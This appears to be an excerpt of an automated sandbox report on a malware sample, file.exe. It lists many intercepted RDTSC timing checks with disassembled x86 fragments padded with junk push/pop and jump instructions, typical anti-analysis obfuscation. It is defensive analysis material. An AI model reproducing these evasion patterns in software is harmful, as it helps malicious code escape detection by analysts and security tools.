Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 757E9C second address: 757EB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jng 00007F4F3C50B5DAh 0x00000010 push ebx 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 757EB9 second address: 757EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 76A62D second address: 76A631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 776FBD second address: 776FDD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4F3CC87F76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F4F3CC87F86h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 776FDD second address: 776FE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 776FE3 second address: 776FE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 776FE7 second address: 777007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3C50B5DDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4F3C50B5DBh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 777007 second address: 77701A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F4F3CC87F76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77701A second address: 777024 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4F3C50B5D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 777024 second address: 77704D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F4F3CC87F7Ah 0x0000000c jmp 00007F4F3CC87F82h 0x00000011 pop ebx 0x00000012 pushad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77704D second address: 77705A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F4F3C50B5D6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7771A9 second address: 7771C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3CC87F86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 777335 second address: 777339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 777339 second address: 77733F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77733F second address: 777345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 777345 second address: 77734A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 777490 second address: 777496 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77775F second address: 777763 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7778CC second address: 777923 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jnc 00007F4F3C50B5D6h 0x00000011 jnp 00007F4F3C50B5D6h 0x00000017 popad 0x00000018 pushad 0x00000019 jno 00007F4F3C50B5D6h 0x0000001f pushad 0x00000020 popad 0x00000021 jmp 00007F4F3C50B5E6h 0x00000026 popad 0x00000027 popad 0x00000028 pushad 0x00000029 pushad 0x0000002a pushad 0x0000002b popad 0x0000002c jnc 00007F4F3C50B5D6h 0x00000032 jnp 00007F4F3C50B5D6h 0x00000038 pushad 0x00000039 popad 0x0000003a popad 0x0000003b pushad 0x0000003c jc 00007F4F3C50B5D6h 0x00000042 push ecx 0x00000043 pop ecx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 777D8A second address: 777DA7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4F3CC87F84h 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 76DD93 second address: 76DD99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 76DD31 second address: 76DD93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3CC87F83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F4F3CC87F7Dh 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 pushad 0x00000016 jmp 00007F4F3CC87F7Ah 0x0000001b jns 00007F4F3CC87F76h 0x00000021 popad 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 push edi 0x00000026 pop edi 0x00000027 jmp 00007F4F3CC87F81h 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f jc 00007F4F3CC87F76h 0x00000035 jnp 00007F4F3CC87F76h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 778FE5 second address: 778FE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 778FE9 second address: 779005 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3CC87F88h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 779005 second address: 77901A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4F3C50B5DCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77901A second address: 779020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 779020 second address: 77902D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F4F3C50B5EFh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77CDA5 second address: 77CDB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F4F3CC87F76h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77CDB0 second address: 77CDB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77CDB8 second address: 77CDF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F4F3CC87F7Bh 0x0000000b jns 00007F4F3CC87F76h 0x00000011 jmp 00007F4F3CC87F7Ah 0x00000016 jmp 00007F4F3CC87F84h 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77CDF5 second address: 77CDFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77CDFA second address: 77CE06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F4F3CC87F76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77CE06 second address: 77CE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77DCB1 second address: 77DCD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3CC87F7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jne 00007F4F3CC87F76h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77F7F7 second address: 77F803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jno 00007F4F3C50B5D6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77F803 second address: 77F807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78510E second address: 785116 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 785116 second address: 785120 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4F3CC87F76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 785120 second address: 78512A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78585F second address: 785879 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F4F3CC87F76h 0x0000000d jp 00007F4F3CC87F76h 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 785879 second address: 78587D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78587D second address: 785891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 js 00007F4F3CC87F76h 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7859F1 second address: 785A06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3C50B5E1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 785A06 second address: 785A24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pushad 0x0000000e jng 00007F4F3CC87F76h 0x00000014 jnl 00007F4F3CC87F76h 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 785A24 second address: 785A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7864BC second address: 7864ED instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4F3CC87F87h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 11DF0CA8h 0x00000011 and di, 671Fh 0x00000016 push 8646AD5Dh 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7864ED second address: 7864F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 786755 second address: 786759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 786759 second address: 78675D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78675D second address: 786763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 786763 second address: 786769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 786769 second address: 78676D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78676D second address: 786771 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78691B second address: 786921 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 787018 second address: 787022 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F4F3C50B5D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7870A3 second address: 7870A9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7870A9 second address: 7870B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F4F3C50B5D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 787229 second address: 78723F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3CC87F82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78723F second address: 787260 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3C50B5E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 787260 second address: 787264 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78768C second address: 7876BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4F3C50B5DDh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4F3C50B5E7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7876BD second address: 7876DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3CC87F89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 787B2F second address: 787B33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 789D40 second address: 789D44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 789D44 second address: 789D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78A76D second address: 78A771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78AA12 second address: 78AA26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3C50B5E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C975 second address: 78C979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78F332 second address: 78F33C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4F3C50B5DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C719 second address: 78C71D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D0A3 second address: 78D0BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4F3C50B5E2h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D0BF second address: 78D0C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C71D second address: 78C723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78F7E3 second address: 78F7ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F4F3CC87F76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78F7ED second address: 78F7F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790831 second address: 790843 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4F3CC87F76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F4F3CC87F76h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790956 second address: 79096F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3C50B5E4h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 792953 second address: 7929DF instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4F3CC87F78h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F4F3CC87F78h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov bx, si 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007F4F3CC87F78h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 call 00007F4F3CC87F81h 0x0000004b xor dword ptr [ebp+122D2694h], ecx 0x00000051 pop edi 0x00000052 push 00000000h 0x00000054 xchg eax, esi 0x00000055 jmp 00007F4F3CC87F7Bh 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d jbe 00007F4F3CC87F7Ch 0x00000063 ja 00007F4F3CC87F76h 0x00000069 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 791A81 second address: 791A85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 791B4E second address: 791B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 792B75 second address: 792B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 792B79 second address: 792B7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 796852 second address: 796857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 796857 second address: 79687C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 ja 00007F4F3CC87F7Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 jmp 00007F4F3CC87F7Ah 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7948FA second address: 79490D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3C50B5DEh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79687C second address: 796893 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F4F3CC87F7Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79490D second address: 7949A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3C50B5E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edi, 68337C57h 0x00000011 push dword ptr fs:[00000000h] 0x00000018 stc 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 push 00000000h 0x00000022 push edx 0x00000023 call 00007F4F3C50B5D8h 0x00000028 pop edx 0x00000029 mov dword ptr [esp+04h], edx 0x0000002d add dword ptr [esp+04h], 00000015h 0x00000035 inc edx 0x00000036 push edx 0x00000037 ret 0x00000038 pop edx 0x00000039 ret 0x0000003a mov dword ptr [ebp+122D1BD6h], ecx 0x00000040 mov edi, dword ptr [ebp+122D3979h] 0x00000046 mov eax, dword ptr [ebp+122D1045h] 0x0000004c pushad 0x0000004d mov eax, ecx 0x0000004f popad 0x00000050 push FFFFFFFFh 0x00000052 jnp 00007F4F3C50B5D9h 0x00000058 call 00007F4F3C50B5E5h 0x0000005d jmp 00007F4F3C50B5DFh 0x00000062 pop edi 0x00000063 push eax 0x00000064 pushad 0x00000065 push ecx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7949A5 second address: 7949AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 798FA9 second address: 798FAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 798FAF second address: 798FD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3CC87F89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 798FD5 second address: 798FDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 798FDA second address: 798FE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79AF11 second address: 79AF2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3C50B5E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
